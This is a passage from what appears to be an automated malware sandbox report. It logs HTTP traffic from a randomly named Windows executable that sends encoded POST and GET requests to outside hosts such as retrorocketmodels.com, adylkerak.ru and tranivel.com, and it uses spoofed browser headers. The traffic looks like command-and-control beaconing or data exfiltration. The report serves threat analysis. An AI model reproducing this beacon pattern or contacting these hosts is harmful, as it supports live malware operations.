                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:37.161252975 CEST778INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:37 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=69170616-5a80-4a85e43286fad706fc118ba3be2eb3943567; Expires=1716813936; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067369424574e08b58b48d9360f0670871980b948440a89de;path=/;HttpOnly;Max-Age=1800
                                          jckl: jp473CFF18LrLXLAJZvi60n2+QwijBWbj7QIvsby8AR6omWOkhMrI+J23mO1yU45lIzpEr7aDL3IotB2wbveAQ==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: aecfe4de7c23571dace5267a98fc8aae
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          45192.168.2.5497603.33.130.190806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:42.231117964 CEST783OUTPOST /vtm3/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Origin: http://www.retrorocketmodels.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.retrorocketmodels.com/vtm3/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 54 54 6c 6d 49 37 7a 4a 6e 57 6c 4b 46 57 38 50 4e 61 4e 67 70 6b 41 36 46 79 6e 6c 59 6f 62 4b 2b 63 7a 63 4d 6d 37 78 47 68 70 50 51 77 79 68 63 4e 55 5a 32 38 79 69 35 62 69 74 56 72 42 65 71 78 6e 49 54 32 6b 54 74 31 50 65 54 35 4c 48 31 62 50 65 46 34 46 41 2f 75 6a 4b 6d 49 76 37 68 6d 6d 66 34 61 41 38 6d 50 57 42 4f 78 41 44 6d 31 6c 54 77 50 68 65 62 70 49 4c 57 62 69 6b 2f 7a 78 61 37 6f 6d 49 46 44 6f 42 46 67 73 67 46 5a 4e 54 46 65 6a 69 38 76 64 34 59 77 55 68 30 6a 4f 76 50 31 69 72 4b 6d 47 72 6b 48 61 6c 43 67 46 43 73 4c 77 43 4e 4f 6b 6e 72 2f 71 73 79 31 61 57 76 59 3d
                                          Data Ascii: 4b34ht=pTTlmI7zJnWlKFW8PNaNgpkA6FynlYobK+czcMm7xGhpPQwyhcNUZ28yi5bitVrBeqxnIT2kTt1PeT5LH1bPeF4FA/ujKmIv7hmmf4aA8mPWBOxADm1lTwPhebpILWbik/zxa7omIFDoBFgsgFZNTFeji8vd4YwUh0jOvP1irKmGrkHalCgFCsLwCNOknr/qsy1aWvY=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          46192.168.2.5497613.33.130.190806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:44.901004076 CEST803OUTPOST /vtm3/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Origin: http://www.retrorocketmodels.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.retrorocketmodels.com/vtm3/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 54 54 6c 6d 49 37 7a 4a 6e 57 6c 4c 6d 4f 38 4e 75 79 4e 31 5a 6b 48 33 56 79 6e 73 34 6f 66 4b 2b 41 7a 63 4d 4f 72 77 30 31 70 49 77 41 79 67 65 6c 55 65 32 38 79 71 5a 62 2b 6a 31 71 50 65 71 4e 46 49 57 65 6b 54 74 68 50 65 53 4a 4c 48 69 48 49 63 56 34 48 49 66 75 6c 58 32 49 76 37 68 6d 6d 66 34 4f 36 38 6d 6e 57 42 2b 68 41 42 48 31 6d 51 77 50 6d 4b 4c 70 49 5a 6d 62 6d 6b 2f 7a 54 61 36 30 41 49 48 4c 6f 42 45 77 73 67 30 5a 4b 47 56 65 35 74 63 75 31 77 4e 74 4f 6e 45 37 31 79 76 30 30 38 72 2b 4d 71 53 71 77 2f 67 6f 74 52 4d 6e 49 53 65 47 54 32 62 65 44 32 52 6c 71 49 34 50 57 59 45 77 51 61 41 55 74 2f 6b 76 74 6f 50 2f 78 64 6a 4f 51
                                          Data Ascii: 4b34ht=pTTlmI7zJnWlLmO8NuyN1ZkH3Vyns4ofK+AzcMOrw01pIwAygelUe28yqZb+j1qPeqNFIWekTthPeSJLHiHIcV4HIfulX2Iv7hmmf4O68mnWB+hABH1mQwPmKLpIZmbmk/zTa60AIHLoBEwsg0ZKGVe5tcu1wNtOnE71yv008r+MqSqw/gotRMnISeGT2beD2RlqI4PWYEwQaAUt/kvtoP/xdjOQ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          47192.168.2.5497623.33.130.190806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:47.438002110 CEST1820OUTPOST /vtm3/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Origin: http://www.retrorocketmodels.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.retrorocketmodels.com/vtm3/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 54 54 6c 6d 49 37 7a 4a 6e 57 6c 4c 6d 4f 38 4e 75 79 4e 31 5a 6b 48 33 56 79 6e 73 34 6f 66 4b 2b 41 7a 63 4d 4f 72 77 30 4e 70 49 43 49 79 67 35 52 55 66 32 38 79 31 70 62 39 6a 31 72 54 65 71 56 42 49 57 61 30 54 75 5a 50 4d 41 52 4c 51 6d 7a 49 56 56 34 48 58 50 75 67 4b 6d 49 36 37 68 32 35 66 37 32 36 38 6d 6e 57 42 38 70 41 46 57 31 6d 66 51 50 68 65 62 70 45 4c 57 61 42 6b 2f 71 6b 61 36 77 32 50 32 72 6f 50 46 41 73 7a 32 42 4b 62 6c 65 2f 75 63 75 74 77 4e 6f 51 6e 45 58 49 79 73 6f 4e 38 71 4b 4d 71 33 62 6d 37 41 38 49 45 74 54 43 65 39 4f 56 71 73 6d 41 7a 53 56 2b 4d 71 6a 6f 59 31 41 47 55 57 51 56 72 46 4f 63 30 37 58 64 51 58 36 61 6d 55 70 33 73 46 42 39 72 59 6c 68 62 68 79 72 62 6c 75 44 43 42 31 6d 76 64 62 4b 70 35 59 34 6f 67 67 61 45 2b 42 5a 49 48 43 70 76 4f 37 38 59 73 74 6b 62 75 61 35 33 66 36 31 46 65 41 47 70 7a 39 6d 41 32 30 37 33 47 6c 6b 57 72 75 39 50 52 44 78 67 65 59 55 30 4a 33 38 52 7a 34 68 52 78 71 39 6b 69 44 6b 63 72 42 4e 6e 56 4c [TRUNCATED]
                                          Data Ascii: 4b34ht=pTTlmI7zJnWlLmO8NuyN1ZkH3Vyns4ofK+AzcMOrw0NpICIyg5RUf28y1pb9j1rTeqVBIWa0TuZPMARLQmzIVV4HXPugKmI67h25f7268mnWB8pAFW1mfQPhebpELWaBk/qka6w2P2roPFAsz2BKble/ucutwNoQnEXIysoN8qKMq3bm7A8IEtTCe9OVqsmAzSV+MqjoY1AGUWQVrFOc07XdQX6amUp3sFB9rYlhbhyrbluDCB1mvdbKp5Y4oggaE+BZIHCpvO78Ystkbua53f61FeAGpz9mA2073GlkWru9PRDxgeYU0J38Rz4hRxq9kiDkcrBNnVLoIoY7rQEe8/M1swP7FMV9QkptTdmOHSsmo7XPxY88247oGvv7+SOipYFhSF2qHRRnm+K8xxMrX/y30P5arJW823DGmotArogca1zTeQGdL6zvIQSLsh8qj6gda49sqvF3rW3LW1rzoqT++o1OqR8N4mDkDLAPMZ4oFrsz9HnYjKlQ9kNu5QU1DU1CfgrfDOirJjqJLPsrXVMiFLdHfpj12DTdXBQNLsVK+bnia6tHi8AKlm+/sO3TtqVOhmibdXnFVGDlsE4xFWFAUNq9tfwS9HM0dBXzOcEP4dhgf5Eraj8jSh/i6G8uJWsfogXRmdGvVZ2ouytlgC7vSZkQp/n5en8tDzHptkBzMCIAzTZvI8WZ7i8489n8NrnK/Vedu4xmFI01VY808FO2asSmkfN6KnST1KXigEw6B0GA5BsUZcB+YD2PN8aZZn4OYc0eNnPw9VxftI8JFFc21dPDuwVaPdNfn6qpy7zL3CSrPg0nIQmzvxH6JluHnTUY2ustd75fhQP4hRyYJVEV6xLCVrdlxaYLOJ5Id85PRjf0CNOUnpSgWZzZ5G+KumE9fzSYiktC/vEd4RgOXfeU1X84kfKhjLh3bRQmtyuRbgRD7u1bdXVVJArVNuTWzJigceqvopXz1evQ9VuLMt9fwVMo3Dz+kjIeOpHPyanEH [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          48192.168.2.5497633.33.130.190806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:49.969013929 CEST512OUTGET /vtm3/?4b34ht=kR7Fl86BSFGGM0PlM+jb3Z8U1XiTwr46KttiVv2q+FBEIB4NiNNJYHhFj5b5v2TtaYgnHWWiT/h6cxdEcVnMTV8uD5XBSlgGjz30dZ+o/GujFcx5HUknEw/XEJ5xYkmM6w==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.retrorocketmodels.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:50.435273886 CEST413INHTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:45:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 273
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 62 33 34 68 74 3d 6b 52 37 46 6c 38 36 42 53 46 47 47 4d 30 50 6c 4d 2b 6a 62 33 5a 38 55 31 58 69 54 77 72 34 36 4b 74 74 69 56 76 32 71 2b 46 42 45 49 42 34 4e 69 4e 4e 4a 59 48 68 46 6a 35 62 35 76 32 54 74 61 59 67 6e 48 57 57 69 54 2f 68 36 63 78 64 45 63 56 6e 4d 54 56 38 75 44 35 58 42 53 6c 67 47 6a 7a 33 30 64 5a 2b 6f 2f 47 75 6a 46 63 78 35 48 55 6b 6e 45 77 2f 58 45 4a 35 78 59 6b 6d 4d 36 77 3d 3d 26 55 78 46 3d 32 4e 66 6c 7a 6e 6b 30 57 4a 33 68 6a 76 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4b34ht=kR7Fl86BSFGGM0PlM+jb3Z8U1XiTwr46KttiVv2q+FBEIB4NiNNJYHhFj5b5v2TtaYgnHWWiT/h6cxdEcVnMTV8uD5XBSlgGjz30dZ+o/GujFcx5HUknEw/XEJ5xYkmM6w==&UxF=2Nflznk0WJ3hjv"}</script></head></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          49192.168.2.54976451.195.44.77806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:55.639969110 CEST756OUTPOST /1jr4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Origin: http://www.adylkerak.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.adylkerak.ru/1jr4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 45 31 39 32 57 63 36 34 65 76 4a 76 48 39 54 51 32 6e 4c 38 43 64 52 66 37 55 2b 53 73 2b 77 6d 62 69 6e 52 65 32 46 76 77 55 53 78 73 51 44 45 72 4b 6c 4d 4c 43 63 4f 70 2f 49 6c 61 2b 2f 65 54 79 6f 79 54 30 36 2f 57 4e 6c 71 62 4a 55 30 5a 6b 57 30 68 2b 76 48 31 35 67 35 53 2b 46 76 78 4e 36 41 36 66 62 49 41 5a 51 76 79 76 37 62 76 47 62 51 36 70 49 7a 46 79 38 37 42 79 65 69 77 6a 6a 71 69 41 53 30 2b 50 66 6e 65 6a 46 55 56 53 54 37 71 51 4a 32 45 52 73 79 4b 59 58 41 67 46 78 49 42 68 53 76 37 68 38 67 42 56 56 7a 56 4c 59 38 76 76 41 47 4b 5a 41 37 42 77 66 48 77 5a 34 55 6f 77 3d
                                          Data Ascii: 4b34ht=pE192Wc64evJvH9TQ2nL8CdRf7U+Ss+wmbinRe2FvwUSxsQDErKlMLCcOp/Ila+/eTyoyT06/WNlqbJU0ZkW0h+vH15g5S+FvxN6A6fbIAZQvyv7bvGbQ6pIzFy87ByeiwjjqiAS0+PfnejFUVST7qQJ2ERsyKYXAgFxIBhSv7h8gBVVzVLY8vvAGKZA7BwfHwZ4Uow=
                                          May 27, 2024 12:45:56.274019957 CEST197INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:56 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          50192.168.2.54976551.195.44.77806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:45:58.172692060 CEST776OUTPOST /1jr4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Origin: http://www.adylkerak.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.adylkerak.ru/1jr4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 45 31 39 32 57 63 36 34 65 76 4a 76 6e 74 54 57 6e 6e 4c 36 69 64 53 54 62 55 2b 59 4d 2b 4b 6d 62 75 6e 52 66 7a 49 76 6c 38 53 78 4f 59 44 46 76 6d 6c 46 62 43 63 46 4a 2f 48 34 4b 2b 68 65 54 2f 66 79 52 67 36 2f 58 70 6c 71 65 74 55 31 75 51 56 33 52 2b 74 4e 6c 35 59 30 79 2b 46 76 78 4e 36 41 2b 33 78 49 44 70 51 76 44 66 37 4b 39 75 59 59 61 70 48 6a 56 79 38 2f 42 79 61 69 77 6a 64 71 6e 59 38 30 34 44 66 6e 63 37 46 56 41 75 51 31 71 51 4c 72 55 51 45 33 37 59 54 46 69 4a 45 4a 6e 51 49 34 4e 70 47 68 33 34 2f 70 33 44 77 76 50 44 34 57 5a 52 33 71 78 52 32 64 54 4a 49 4b 2f 6d 30 59 70 7a 37 4d 47 62 66 73 2b 45 69 32 57 62 4f 2f 4a 56 4b
                                          Data Ascii: 4b34ht=pE192Wc64evJvntTWnnL6idSTbU+YM+KmbunRfzIvl8SxOYDFvmlFbCcFJ/H4K+heT/fyRg6/XplqetU1uQV3R+tNl5Y0y+FvxN6A+3xIDpQvDf7K9uYYapHjVy8/ByaiwjdqnY804Dfnc7FVAuQ1qQLrUQE37YTFiJEJnQI4NpGh34/p3DwvPD4WZR3qxR2dTJIK/m0Ypz7MGbfs+Ei2WbO/JVK
                                          May 27, 2024 12:45:58.789990902 CEST197INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:58 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          51192.168.2.54976651.195.44.77806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:46:00.708856106 CEST1793OUTPOST /1jr4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Origin: http://www.adylkerak.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.adylkerak.ru/1jr4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 70 45 31 39 32 57 63 36 34 65 76 4a 76 6e 74 54 57 6e 6e 4c 36 69 64 53 54 62 55 2b 59 4d 2b 4b 6d 62 75 6e 52 66 7a 49 76 6a 6b 53 77 39 41 44 48 49 79 6c 66 62 43 63 47 4a 2f 45 34 4b 2f 39 65 54 6e 54 79 52 38 71 2f 56 68 6c 72 34 68 55 38 36 4d 56 67 68 2b 74 44 31 35 6a 35 53 2b 4d 76 78 64 2b 41 36 54 78 49 44 70 51 76 41 48 37 4b 76 47 59 65 61 70 49 7a 46 79 34 37 42 7a 48 69 30 32 6d 71 6a 46 4a 30 49 6a 66 6d 38 72 46 58 79 47 51 71 61 51 46 6f 55 51 63 33 2b 42 4e 46 69 56 2b 4a 6a 59 6d 34 4b 6c 47 68 47 42 4f 73 47 76 67 38 74 6a 31 45 4f 5a 4d 2b 57 59 62 52 79 68 6a 43 66 79 4f 52 6f 48 4d 61 7a 76 44 34 39 56 37 33 44 62 4b 2f 64 6b 6b 4f 46 79 74 73 45 68 4d 4f 68 37 6f 71 30 73 76 54 52 77 36 30 65 78 69 62 36 42 38 79 49 55 4d 45 4f 71 6d 68 55 35 6d 64 43 6d 66 51 36 38 69 64 73 50 6a 66 39 4a 73 55 42 71 73 46 34 37 67 43 68 6f 4d 7a 4f 39 43 6c 41 55 7a 43 78 36 62 47 74 52 47 75 38 54 46 55 61 6b 58 63 6f 4d 62 56 41 48 62 53 72 69 63 61 2f 79 56 69 6c 4f [TRUNCATED]
                                          Data Ascii: 4b34ht=pE192Wc64evJvntTWnnL6idSTbU+YM+KmbunRfzIvjkSw9ADHIylfbCcGJ/E4K/9eTnTyR8q/Vhlr4hU86MVgh+tD15j5S+Mvxd+A6TxIDpQvAH7KvGYeapIzFy47BzHi02mqjFJ0Ijfm8rFXyGQqaQFoUQc3+BNFiV+JjYm4KlGhGBOsGvg8tj1EOZM+WYbRyhjCfyORoHMazvD49V73DbK/dkkOFytsEhMOh7oq0svTRw60exib6B8yIUMEOqmhU5mdCmfQ68idsPjf9JsUBqsF47gChoMzO9ClAUzCx6bGtRGu8TFUakXcoMbVAHbSrica/yVilOE8yKczlU8EfErTKI3GvUEHQ62ypbmw9zabRNYZ60Wdopy/qrbdg5YtsCdnRvSxnJFjOojW9cDWxqyfbSwgkCVhW9HKCV/pC5+EdUpUvj7zcx9HzsBS2VQq41p28JM59OkZ0aK0LQVsA/81LMqiWtAEs21MUx78eZJOWOS3AZPgL+Zt94WS7k7Ta0O/Oo5B91Ih2DknuSbZ+dsDLjG7nD4dZ1Atbv3nPnjbRzk4egT+UAtwsIxWpqd+8jTqQFd5+8Nw+7Sm7kaNse3hOwTbJjgx5w+ouCNW4lqzGTBqFob+BsZwqJ0n3tGwrSPLpqexX0A1G6KzBBASinkQL2zOUwZu0PL3NJ7hIG0rbPUKQZ5p0leI/WzFIq7IlYho6bMwkl5ng3czEux0OoT+L3viL76ZF7CxzFz42CCjxEpBiw4CT2Hb4D0IMUXP2ficmYrzqrKYDMhY7GbNLikRIljcx+Dcn7rKxei531jlO3phNcix/RMi9ah93pUFCmuDemcMkwBcMK0zd2MVxlVNbfHRaBOVimNjmTXgDBMYD2OWyu69E0fXDYahHpzrqYxcOn+PLCqHNlL4nWBXYQZJc7qJ6/YkNAkkYT+NiTcxDRhLmY9uXgthtbWDJg8DODV3nSCNQcQ0ks/EEtV9Z0WcBCMmlUSqRGynnyi5BOzv [TRUNCATED]
                                          May 27, 2024 12:46:01.379152060 CEST197INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:46:01 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          52192.168.2.54976751.195.44.77806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:46:03.256364107 CEST503OUTGET /1jr4/?4b34ht=kGdd1iddr+mvgzlLI3SGjgxAabUOGsKw2bG4JPXV9hwIwsQyE7CLPYW2F+PDsbjHTDHawkku/URFrqQj7JM/kB2xKVcJ0yqZ4Q9OBe3AFA9XjQjtHcn6JNxir1+KynzC3w==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.adylkerak.ru
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:46:03.895646095 CEST197INHTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:46:03 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/5.4.16
                                          Content-Length: 20
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                          Data Ascii: Unknown request type


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          53192.168.2.549768217.70.184.50806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:46:09.061804056 CEST756OUTPOST /fr5e/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.tranivel.com
                                          Origin: http://www.tranivel.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.tranivel.com/fr5e/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 7a 39 6d 74 39 72 73 63 36 2f 63 2f 48 59 53 34 71 6d 62 75 50 64 39 6e 56 64 48 62 32 4b 45 34 66 51 32 7a 39 4c 62 63 6d 43 6d 36 52 78 4a 6b 64 43 39 6a 51 50 37 62 4a 67 2b 78 78 34 59 64 62 6a 4f 6c 31 7a 42 72 74 71 64 33 4f 39 6b 65 47 4a 70 30 67 2f 52 6d 41 61 65 72 35 4b 58 78 45 78 47 36 52 4b 49 70 54 33 6e 46 4d 41 4e 7a 53 7a 57 31 35 47 6e 51 42 6b 32 54 64 69 4b 7a 71 57 54 67 39 77 50 65 4a 59 6d 6d 68 51 31 79 79 51 74 78 77 4b 33 4b 78 6a 45 53 4f 34 48 45 4b 36 43 44 35 44 47 49 4e 79 74 42 66 38 6e 34 56 79 56 49 76 54 58 68 43 59 30 71 55 36 6d 62 56 64 62 61 4d 57 38 3d
                                          Data Ascii: 4b34ht=z9mt9rsc6/c/HYS4qmbuPd9nVdHb2KE4fQ2z9LbcmCm6RxJkdC9jQP7bJg+xx4YdbjOl1zBrtqd3O9keGJp0g/RmAaer5KXxExG6RKIpT3nFMANzSzW15GnQBk2TdiKzqWTg9wPeJYmmhQ1yyQtxwK3KxjESO4HEK6CD5DGINytBf8n4VyVIvTXhCY0qU6mbVdbaMW8=
                                          May 27, 2024 12:46:09.692454100 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:46:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
